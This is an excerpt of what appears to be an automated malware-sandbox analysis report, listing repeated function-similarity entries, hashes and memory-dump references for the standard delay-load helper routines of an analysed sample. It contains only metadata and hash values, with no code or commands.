                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f6844e0f4674d3cea2df35aa3a8b08a1064d23de618f4ded1c54c1e9e831e82d
                                                                                            • Instruction ID: 29cb8827dd65bf28c10de10f9b7047f2b05a2405b4d63a06fcbc70be0c3bb72f
                                                                                            • Opcode Fuzzy Hash: f6844e0f4674d3cea2df35aa3a8b08a1064d23de618f4ded1c54c1e9e831e82d
                                                                                            • Instruction Fuzzy Hash: C7B092AA298000BC2944A1091D06C36016CE0C5B20330862AB806C00809840A9000531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: d6c348fa67f78f1328fa353f5ee1eedc1b4a6dbe38ccdc0f837b488c4b817aa1
                                                                                            • Instruction ID: 791efa1d2accf96dd5714efd7564d8ae6be434e0a44a9c48ed81d5a6dfcefa96
                                                                                            • Opcode Fuzzy Hash: d6c348fa67f78f1328fa353f5ee1eedc1b4a6dbe38ccdc0f837b488c4b817aa1
                                                                                            • Instruction Fuzzy Hash: 01B012EA3E9040BC3D44E1091D02C3B01BDF4C4B20330463EF807C0090DC407C000531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: b4e8d2a7014e0bc9f50efab59292c4762f94e7413bb91591656bfacb89072bbe
                                                                                            • Instruction ID: 68e17b6c5a141b0bb775e5e83b6a8068f603a394e825ad05923fa75d629c8c0c
                                                                                            • Opcode Fuzzy Hash: b4e8d2a7014e0bc9f50efab59292c4762f94e7413bb91591656bfacb89072bbe
                                                                                            • Instruction Fuzzy Hash: 69B012EE3D8000BC3D44E1191D02C3701BCE0C5B20330C63EFC06C0080DA40BC000531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 8945e3bd4bf1dba1df9c069a667b89c1ca1d28c462ec449154fb649a1a88cadb
                                                                                            • Instruction ID: e4600793ab25860fec8d948340df51a43e2635a4a8eec830815e17dd5085a5e8
                                                                                            • Opcode Fuzzy Hash: 8945e3bd4bf1dba1df9c069a667b89c1ca1d28c462ec449154fb649a1a88cadb
                                                                                            • Instruction Fuzzy Hash: 1FB012EE3D9040BC3D44E1091D02C37017DE0C5B20330863EFC06C0080DC40BC000531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: a9b6315594139446e9e29d616ee536fa7eee4d40efdb440324dda04fbea6fe48
                                                                                            • Instruction ID: af3a51c879328ca5a9854a0b95ab5f9a941d40cd0d227a9b519a677996de4137
                                                                                            • Opcode Fuzzy Hash: a9b6315594139446e9e29d616ee536fa7eee4d40efdb440324dda04fbea6fe48
                                                                                            • Instruction Fuzzy Hash: 24B012FA3D9140BC3D84E2091D02C37017DE0C4B20330473FF806C0080DC407C440531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e8a8be832125db083840e8d782d440867ba516a7be53c17fb45b2d04c63f99ae
                                                                                            • Instruction ID: d0708b2ec73b233deddecd67932cf5b0f367e22f9eebfe317cf29ab5a209185f
                                                                                            • Opcode Fuzzy Hash: e8a8be832125db083840e8d782d440867ba516a7be53c17fb45b2d04c63f99ae
                                                                                            • Instruction Fuzzy Hash: A3B012FE358000BC3904E6085E06C37027CE0C0F20330942EF815C5080E8405E000533
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e1925bd68afcfd0c0861a171e7e34d49371dbb60bf21c4d2361317e5b6b13644
                                                                                            • Instruction ID: 145d01e6132c0f5b64cf71368101e0697ad2d85ef1b56fbb453606e697c5a656
                                                                                            • Opcode Fuzzy Hash: e1925bd68afcfd0c0861a171e7e34d49371dbb60bf21c4d2361317e5b6b13644
                                                                                            • Instruction Fuzzy Hash: 40B012FE35D0007C3904E6055F02C37027CE0C0B20330D42EF515C5080D8401C090533
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 41a890ee806fa2ecdc5994685636fb64d5f0e46587a7bf98d3640b1477f142e2
                                                                                            • Instruction ID: 5630b48df00432ef5b4c86c7cec1f5a45b0db2c483d5e5fb61dbe07fb3645273
                                                                                            • Opcode Fuzzy Hash: 41a890ee806fa2ecdc5994685636fb64d5f0e46587a7bf98d3640b1477f142e2
                                                                                            • Instruction Fuzzy Hash: 79B012FE359000BC3904E6055E02C37027CE0C0B20330D42EF815C5080D8405C040533
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: e751534672a5b086c73fe71a7c14e6136f77f1d2ec006001c8a697a82851ac5a
                                                                                            • Instruction ID: d4f1318e1218d442f3c159445d7e03ae11339e8adead76ac5dfd1b19b6b9403a
                                                                                            • Opcode Fuzzy Hash: e751534672a5b086c73fe71a7c14e6136f77f1d2ec006001c8a697a82851ac5a
                                                                                            • Instruction Fuzzy Hash: C1B012DE3590007C7D04E2549F02C3B017CE0C0B20330572EF406C1080EC400E01053A
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 380b94df52ca5870bb7e4953966c16860a2e5442f447c2ed84ea07a0f938c0d2
                                                                                            • Instruction ID: 2945b53bfa533a5fcb5b613de2d2bd1a7c91b67c215397c4f9e595880e95bf22
                                                                                            • Opcode Fuzzy Hash: 380b94df52ca5870bb7e4953966c16860a2e5442f447c2ed84ea07a0f938c0d2
                                                                                            • Instruction Fuzzy Hash: BCB012DE3591007C7D44E2549E03C37017CE0C0B20330572FF406C1080E8400D400536
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5eebd21febd66cd72ea3760ea63fa2c86de903c7aef9ca4abf2cc223530d0c42
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 5eebd21febd66cd72ea3760ea63fa2c86de903c7aef9ca4abf2cc223530d0c42
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 23f970125a6774b2457c13c8047251c956cb7fb5258b98c7c8631ff99efb79bd
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 23f970125a6774b2457c13c8047251c956cb7fb5258b98c7c8631ff99efb79bd
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: fd8ffc18164d65eae8a77822cb5e4b353c753491cb1e91ed23d4f9be444bed39
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: fd8ffc18164d65eae8a77822cb5e4b353c753491cb1e91ed23d4f9be444bed39
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 292e6da1cc5c6db22178ff9e2e16c40028e36c58f49e05733f10eedc72e199cd
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 292e6da1cc5c6db22178ff9e2e16c40028e36c58f49e05733f10eedc72e199cd
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
